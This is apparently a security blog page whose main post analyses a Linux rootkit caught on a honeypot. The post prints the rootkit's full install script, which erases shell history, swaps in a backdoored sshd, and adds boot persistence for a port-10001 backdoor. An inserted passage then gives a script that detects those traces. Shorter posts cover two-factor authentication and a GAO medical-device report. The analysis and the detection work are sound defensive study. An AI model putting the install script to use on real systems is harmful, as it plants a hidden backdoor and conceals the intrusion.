Linux Rootkit "bum.pdf" dropped onto my Honeypot Today

A malicious user from Romania using PuTTY dropped off a Linux rootkit on my honeypot today.

From my initial analysis it appears that the package installs a hidden SSH server listening on port 10001.

I haven't had much time to look through the entire package but if you'd like to browse what was dropped off I have uploaded everything to CaffSec-Malware-Analysis.

If you find anything interesting please feel free to post a comment.


UPDATE: I have found a related article on TMCNET.com talking about a backdoor installed on port 10001.  Read the article here: http://blog.tmcnet.com/blog/tom-keating/asterisk/hacked-asterisk-pbx-update.asp


Here is the install script for the main payload.  Interesting stuff!

#!/bin/bash
unset HISTSAVE
unset HISTFILE
unset SAVEFILE
unset history
mv libcrypto.so.4 /lib/
chattr -suia /usr/sbin/zdump
rm -rf /usr/sbin/zdump
mv sshd /usr/sbin/zdump
chattr +suia /usr/sbin/zdump
mkdir -p /usr/include/X11/.swap/
tar xvfz pic.tar.gz -C /usr/include/X11/.swap/ >>/dev/null
mkdir -p /usr/include/sound
mv sound.so /usr/include/sound/
mv sounds.h /usr/include/sound/
chmod 770 /usr/include/sound/sounds.h
/usr/include/sound/sounds.h
echo "# Now that we have all of our basic modules loaded and the kernel going,">>/etc/rc.sysinit
echo "# let's dump the syslog ring somewhere so we can find it later" >>/etc/rc.sysinit
echo "/usr/include/sound/sounds.h" >>/etc/rc.sysinit
sleep 10
echo "Enjoy your new box on port 10001"
cd ..
rm -rf rks*
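As an added example (my own, not part of the dropped package or of this post), here is a read-only POSIX shell check for the traces that install script leaves behind: the launcher line appended to /etc/rc.sysinit, the dropped files under /usr/include, the swapped /usr/sbin/zdump with its chattr +suia attributes, and a listener on port 10001. The paths are taken from the script above; the "OpenSSH strings inside zdump" test is a heuristic I chose, since the genuine zdump from tzdata carries none, and it is not something the sample itself states.

```shell
#!/bin/sh
# Added example, not part of the captured sample: a read-only check for the
# traces the install script above leaves behind. ROOT defaults to "/" and may
# instead point at a mounted disk image or a test tree.
# Each hit is printed; the hit count is the function's return status, so a
# status of 0 means none of the indicators was found.

check_rootkit_indicators() {
    root="${1:-/}"
    root="${root%/}"          # strip trailing slash so "$root$path" joins cleanly
    hits=0

    # 1. Persistence: the installer appends its launcher path to /etc/rc.sysinit.
    #    The two comment lines it adds first read like the stock rc.sysinit
    #    comment, so match on the launcher path, not on the comment text.
    if [ -f "$root/etc/rc.sysinit" ] \
       && grep -q '/usr/include/sound/sounds.h' "$root/etc/rc.sysinit"; then
        echo "HIT: $root/etc/rc.sysinit runs /usr/include/sound/sounds.h at boot"
        hits=$((hits + 1))
    fi

    # 2. Dropped files: a "header" that is really an executable launcher, a shared
    #    object next to it, and a hidden directory under the X11 include tree.
    for p in /usr/include/sound/sounds.h /usr/include/sound/sound.so /usr/include/X11/.swap; do
        if [ -e "$root$p" ]; then
            echo "HIT: unexpected path $root$p"
            hits=$((hits + 1))
        fi
    done

    # 3. Replaced binary: the genuine zdump (time zone dumper from tzdata) carries
    #    no OpenSSH strings; the dropped one is an sshd build. Heuristic, so treat
    #    a hit as "inspect this file", not as proof on its own.
    zd="$root/usr/sbin/zdump"
    if [ -f "$zd" ] && grep -aq 'OpenSSH' "$zd"; then
        echo "HIT: $zd contains OpenSSH strings"
        hits=$((hits + 1))
    fi

    # 4. Attribute abuse: chattr +suia makes the file immutable and append-only,
    #    which is how the installer keeps a package upgrade from undoing the swap.
    #    lsattr exists only on Linux with e2fsprogs; skip quietly elsewhere.
    if [ -f "$zd" ] && command -v lsattr >/dev/null 2>&1; then
        attrs=$(lsattr "$zd" 2>/dev/null | cut -d' ' -f1)
        case "$attrs" in
            *i*|*a*) echo "HIT: immutable/append-only attributes on $zd ($attrs)"
                     hits=$((hits + 1)) ;;
        esac
    fi

    # 5. Live listener: only meaningful on the running system ("$root" is empty
    #    after the slash strip when ROOT was "/"), so skipped for image trees.
    if [ "$root" = "" ] && command -v ss >/dev/null 2>&1 \
       && ss -ltn 2>/dev/null | grep -q ':10001[[:space:]]'; then
        echo "HIT: something is listening on TCP port 10001"
        hits=$((hits + 1))
    fi

    return "$hits"
}

# Run directly with an optional root directory; when sourced, just call the function.
if [ "$#" -gt 0 ]; then
    check_rootkit_indicators "$1"
    exit "$?"
fi
```

Run it as root so lsattr and ss can see everything, or point it at the mount point of an offline image; the nonzero exit status makes it easy to wire into cron or a monitoring check. Because the installer only swaps userland binaries and edits rc.sysinit, these checks work on the live system, but if the rest of the package (pic.tar.gz is not shown here) hides files, the offline-image run is the one to trust.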
 

Perpetual Efforts in Futility - A History of Computing Security

I've threatened to do this for a while now...and I've finally got the motivation to do so.

I always said one of these days I need to write a book on all the crazy computer stuff I've seen over the years.  But then it dawned on me...there is no real "timeline" out there of the history of computing security.  Sure, some of it is interlaced between the pages of other computing history books or sites...but security is always an afterthought...a footnote.

So why "Perpetual Efforts in Futility"?  I've had that name picked out for years.  Security has always been a cat-and-mouse game of seeing who can outsmart the other.  Malware writers and other malicious individuals are always at odds with the security folks in a perpetual "war" which will never really end.

So, using Blogger, I'm going to begin piecing together a timeline of the history of computing security.  Eventually, when everything is complete to my satisfaction, maybe I'll even publish it as a book.  Who knows!

So without further delay, I present to you my first entry in "Perpetual Efforts in Futility" - an article about the very first computer worm "Creeper".


Please be sure to check "Perpetual Efforts in Futility" for future updates!

Google Two Factor Authentication - Protect Your Gmail and Google+ Account!

Have you secured your Google account with two-factor authentication yet?

If you have a smartphone such as a BlackBerry, Android or iPhone you can easily add an extra layer of protection to your Google account, including Gmail and Google+.

The authenticator app is available at no charge whatsoever.  Google provides instructions on how to install the app based upon your phone.

Once set up, you will be asked for a time-sensitive PIN generated by your smartphone whenever you log in to your Google account.

Even if your account password is stolen or guessed your account will be secure!

Read more at Google's 2-step verification page.

Threat Watch updated to include Malware Indicator Trends

I've updated the Threat Watch page to include global home-based malware infection indicators. Please note that this feature is still experimental. You can also read more about how I created this map and graph.

FDA Fails to Properly Evaluate Medical Device Security per U.S. GAO Report

Warning: The contents of this blog post could (literally) give you a heart attack.

The U.S. Government Accountability Office website has published an interesting report on Information Security and Medical Devices.  Unfortunately this report has probably been missed amid all the U.S. elections news.

The 62-page report calls out the FDA on its 2001 and 2006 premarket reviews of two medical devices with known vulnerabilities and states that "FDA considered information security risks from unintentional threats, but not risks from intentional threats".  While it is comforting to know that the FDA is looking at issues such as accidental electromagnetic interference, it worries me that the FDA is not considering more serious threats, such as intentional malicious interference with a device.

Specifically, FDA considered risks from unintentional threats for four of the eight information security control areas GAO selected for its evaluation—software testing, verification, and validation; risk assessments; access control; and contingency planning. However, the agency did not consider risks from intentional threats for these areas, nor did the agency provide evidence of its review for risks from either unintentional or intentional threats for the remaining four information security control areas—risk management, patch and vulnerability management, technical audit and accountability, and security-incident-response activities. According to FDA, it did not consider information security risks from intentional threats as a realistic possibility until recently. In commenting on a draft of this report, FDA said it intends to reassess its approach for evaluating software used in medical devices, including an assessment of information security risks.

This report is definitely an eye-opening read, and also shows that the Federal Government is starting to think outside the box when it comes to Information Security.

Report:
Highlights - FDA Should Expand Its Consideration of Information Security for Certain Types of Devices


Download Full Report (PDF)